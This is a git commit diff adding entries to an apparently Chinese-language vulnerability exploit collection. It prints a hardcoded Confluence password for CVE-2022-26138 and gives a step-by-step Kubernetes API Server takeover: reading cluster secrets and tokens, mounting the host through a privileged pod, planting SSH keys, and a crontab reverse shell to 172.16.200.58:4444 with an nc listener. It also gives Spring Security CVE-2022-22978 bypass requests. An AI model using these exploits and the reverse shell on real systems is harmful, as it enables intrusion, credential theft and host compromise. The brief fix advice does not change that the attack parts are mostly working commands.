更新漏洞

2025-11-05 10:50:23 +00:00 · 2023-02-28 17:36:35 +08:00 · 2023-02-28 17:36:35 +08:00 · d13a55ae2f
commit d13a55ae2f
parent 4a94d60344
8 changed files with 270 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -201,6 +201,7 @@
  * Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449
  * Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451
  * Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181
+  * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138
  * AVCON6 系统管理平台 download.action 任意文件下载漏洞
  * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
  * AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854
@ -444,6 +445,9 @@
  * Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
  * Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725
  * Zabbix SAML身份绕过漏洞 CVE-2022-23131
+- 云安全漏洞
+
+  * K8s API Server未授权命令执行
 - 其他漏洞

  * 微信客户端 远程命令执行漏洞
@ -506,6 +510,7 @@
  * Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
  * SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
  * Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
+  * VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978
  * VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
  * VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
  * VMware vCenter 任意文件读取漏洞
--- a/Web应用漏洞/Atlassian
+++ b/Web应用漏洞/Atlassian
@ -0,0 +1,51 @@
+# Atlassian Questions For Confluence 身份认证绕过漏洞CVE-2022-26138
+
+## 漏洞描述
+
+Atlassian官方发布了2022年7月的安全更新，其中涉及到Confluence Server的多个漏洞，其中CVE-2022-26138为一个硬编码漏洞。
+
+当Confluence Server或Data Center上的Questions for Confluence app启用时，它会创建一个名为`disabledsystemuser`的Confluence用户帐户。此帐户旨在帮助将数据从应用程序迁移到 Confluence Cloud的管理员账号中。该帐户通过使用**硬编码密码**创建并添加到confluence-users组中，在默认情况下允许查看和编辑 Confluence 中的所有非受限页面。
+
+未经身份验证攻击者可以利用所知的硬编码密码登录Confluence并访问该组有权限访问的所有页面。
+
+## 漏洞影响
+
+```
+Questions for Confluence app == 2.7.34
+Questions for Confluence app == 2.7.35
+Questions for Confluence app == 3.0.2
+```
+
+## 漏洞分析
+
+下载应用程序 **confluence-questions-3.0.2.jar** 或者另外两个版本。
+
+```
+https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar
+```
+
+分析源码，在配置文件default.properties中可以找到所创建用户的相关信息，其中的username和password都是固定的。
+
+使用Java Decompiler打开jar文件，在配置文件default.properties中可以找到所创建用户的相关信息。
+
+![image-20230228165102312](images/image-20230228165102312.png)
+
+
+上传Questions for Confluence应用程序，使用硬编码用户密码成功登录。
+
+```
+predefined.user.username=disabledsystemuser
+predefined.user.password=disabled1system1user6708
+```
+
+## 修复建议
+
+目前厂商已发布升级更新Questions for Confluence扩展至以下安全版本:
+
+- 2.7.x >= 2.7.38 (Confluence 6.13.18 到 7.16.2)
+
+- Versions >= 3.0.5 (Confluence 7.16.3 之后的版本)
+
+```
+https://jira.atlassian.com/browse/CONFSERVER-79483
+```
--- a/Web应用漏洞/images/image-20230228165102312.png
+++ b/Web应用漏洞/images/image-20230228165102312.png
--- a/Server未授权命令执行.md
+++ b/Server未授权命令执行.md
@ -0,0 +1,170 @@
+# K8s API Server未授权命令执行
+
+## 漏洞描述
+
+Kubernetes是一个可以移植、可扩展的开源平台，使用 声明式的配置 并依据配置信息自动地执行容器化应用程序的管理。在所有的容器编排工具中（类似的还有 docker swarm / mesos等），Kubernetes的生态系统更大、增长更快，有更多的支持、服务和工具可供用户选择。
+
+K8s 的API Server默认服务端口为8080(insecure-port)和6443(secure-port)，8080端口提供HTTP服务，没有认证授权机制，而6443端口提供HTTPS服务，支持认证(使用令牌或客户端证书进行认证)和授权服务。默认情况下8080端口不启动，而6443端口启动。这两个端口的开放取决于/etc/kubernetes/manifests/kube-apiserver.yaml配置文件。
+
+如果目标K8s的8080端口开启了，由于其没有认证授权机制，因此存在未授权访问。
+
+如果目标K8s的6443端口开启了，如果配置错误，也可以导致存在未授权访问。
+
+## 漏洞复现
+
+### 8080端口
+
+默认情况下，8080端口关闭的，手动开启：
+
+```
+cd /etc/kubernetes/manifests
+vim kube-apiserver.yaml
+```
+
+高版本的k8s中，将--insecure-port这个配置删除了，因此添加如下两行：
+
+```
+
+- --insecure-port=8080
+- --insecure-bind-address=0.0.0.0
+```
+
+![image-20230215102911534](images/image-20230215102911534.png)
+
+重启k8s：
+
+```
+systemctl restart kubectl
+```
+
+访问8080端口即可看到存在未授权：
+
+![image-20230215110103802](images/image-20230215110103802.png)
+
+也可以使用kubectl远程连接获得信息：
+
+```
+kubectl -s http://your-vps-ip:8080 get nodes
+```
+
+注：在高版本（1.20及其以后）的K8s中直接禁用了该端口，并且无法打开。
+
+### 6443端口
+
+如果运维人员配置不当，将"system:anonymous"用户绑定到"cluster-admin"用户组，则会使得6443端口允许匿名用户以管理员权限访问。
+
+正常情况下访问6443端口，提示Forbidden。
+
+![image-20230215110607076](images/image-20230215110607076.png)
+
+执行如下命令将"system:anonymous"用户绑定到"cluster-admin"用户组：
+
+```
+kubectl create clusterrolebinding cluster-system-anonymous --clusterrole=cluster-admin --user=system:anonymous
+```
+
+再次访问访问6443端口，即可未授权访问。
+
+## 漏洞利用
+
+### 命令执行
+
+#### 查看k8s集群信息
+
+```
+kubectl -s http://your-vps-ip:8080 cluster-info
+```
+
+#### 查看node节点信息
+
+```
+#查看node节点
+kubectl -s http://your-vps-ip:8080 get nodes
+
+#查看node节点详细信息
+kubectl -s http://your-vps-ip:8080 get nodes -o wide
+```
+
+#### 查看pod节点信息
+
+```
+#查看所有的pod
+kubectl -s http://your-vps-ip:8080 get pods -A
+```
+
+#### 执行其他命令
+
+通过获取到的pods节点信息，进入对应docker 命令执行。-n对应的是NAMESPACE，-it 对应的是NAME：
+
+```
+#进入命名空间为default，名字为hello-minikube的容器
+kubectl -s http://your-vps-ip:8080 exec -n default -it hello-minikube -- /bin/bash
+
+#进入命名空间为kube-system，名字为etcd-ubuntu的容器
+kubectl -s http://your-vps-ip:8080 exec -n kube-system -it etcd-ubuntu -- /bin/sh
+```
+
+### 获取Token登录dashboard
+
+访问如下接口，即可看到K8s所有的Token，我们过滤找到dashboard-admin相关的Token。
+
+```
+http://your-vps-ip:8080/api/v1/namespaces/kube-system/secrets/
+
+https://your-vps-ip:6443/api/v1/namespaces/kube-system/secrets/
+```
+
+然后对其base64解码一次，即可使用base64解码后的Token登录K8s的dashboard。
+
+### 获取宿主机权限
+
+#### 创建pod
+
+通过k8s dashboard，创建特权Pods来获得宿主机权限。登录dashboard后台后，点击右上角+号，然后输入如下命JSON内容，创建名为myapp的pod，并且将宿主机的目录挂在到了/mnt目录下：
+
+```
+apiVersion: v1
+kind: Pod
+metadata:
+  name: myapp
+spec:
+  containers:
+  - image: nginx
+    name: container
+    volumeMounts:
+    - mountPath: /mnt
+      name: test
+  volumes:
+  - name: test
+    hostPath:
+      path: /
+```
+
+点击工作负载→Pods，可以看到刚才创建的pod。
+
+点击myapp名称。点击右上角进入Shell窗口。
+
+#### 写入ssh公钥
+
+切换到/mnt/root/.ssh目录下，写入公钥文件，即可免密登录宿主机。
+
+#### 定时任务反弹shell
+
+也可以往宿主机写入crontab来反弹获取shell，执行如下命令，将反弹shell的命令写入/var/spool/cron/root文件中：
+
+```
+echo "*/1  *  *  *  *   /bin/bash -i>&/dev/tcp/172.16.200.58/4444 0>&1" > root
+```
+
+nc监听接收反弹shell：
+
+```
+$ nc -lvp 4444
+```
+
+#### chroot逃逸
+
+```
+chroot /mnt
+```
+
--- a/云安全漏洞/images/image-20230215102911534.png
+++ b/云安全漏洞/images/image-20230215102911534.png
--- a/云安全漏洞/images/image-20230215110103802.png
+++ b/云安全漏洞/images/image-20230215110103802.png
--- a/云安全漏洞/images/image-20230215110607076.png
+++ b/云安全漏洞/images/image-20230215110607076.png
--- a/服务器应用漏洞/VMware
+++ b/服务器应用漏洞/VMware
@ -0,0 +1,44 @@
+# VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978
+
+## 漏洞描述
+
+VMware Spring Security是美国威睿（VMware）公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。VMware Spring Security存在授权问题漏洞，该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符（**.**）处理不受信任的输入时存在输入验证错误。
+
+参考链接：
+
+- https://xz.aliyun.com/t/11473
+
+## 漏洞影响
+
+```
+Spring Security 5.5.x < 5.5.7 
+Spring Security 5.6.x < 5.6.4 
+Spring Security 其他低版本同样受影响
+```
+
+## 漏洞复现
+
+正常访问/admin/下任何路由均会提示403。
+
+在/admin/下任何路由中，插入`%0a`或者`%0d`,即可绕过验证访问页面。
+
+poc：
+
+```
+/admin/%0a%0d
+```
+
+例如：
+
+```
+GET /admin/%0atest HTTP/1.1
+```
+
+```
+GET /admin/%0dtest HTTP/1.1
+```
+
+```
+GET /admin/%0a%0d%0dtest HTTP/1.1
+```
+